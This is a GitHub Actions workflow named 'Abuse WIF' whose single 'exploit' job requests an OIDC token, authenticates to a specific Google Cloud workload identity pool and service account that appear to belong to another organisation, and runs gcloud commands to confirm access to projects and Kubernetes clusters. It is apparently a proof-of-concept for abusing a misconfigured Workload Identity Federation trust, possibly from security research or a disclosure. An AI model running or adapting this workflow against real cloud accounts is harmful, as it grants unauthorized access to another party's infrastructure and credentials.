name: Abuse WIF

permissions:
  contents: read
  id-token: write

on:
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Attempt WIF Authentication
        uses: google-github-actions/auth@v2
        with:
          workload_identity_provider: projects/1094498259535/locations/global/workloadIdentityPools/gh-charts-main/providers/github-by-repos
          service_account: publish-helm-charts@devopsre.iam.gserviceaccount.com

      - name: Confirm Access with gcloud
        run: |
          gcloud auth list
          gcloud projects list
          gcloud container clusters list || true
